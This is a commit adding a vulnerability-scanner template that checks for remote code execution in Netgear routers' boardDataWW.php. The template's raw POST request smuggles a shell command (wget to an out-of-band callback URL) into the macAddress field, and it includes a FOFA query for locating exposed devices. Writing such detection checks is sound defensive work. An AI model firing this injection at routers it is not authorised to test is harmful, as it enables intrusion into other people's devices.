Create netgear-boarddataww-rce.yaml

patch-3
pussycat0x 2024-05-23 18:27:16 +05:30 committed by GitHub
parent 6e9f8f031e
commit 9ac9c195d7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: netgear-boarddataww-rce
info:
name: Netgear router boardDataWW.php - Remote Code Execution
author: pussycat0x
severity: high
description: |
There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash.
reference:
- https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: title=="Netgear"
tags: rce,netgear,iot
http:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "<title>Netgear</title>"
- type: status
status:
- 200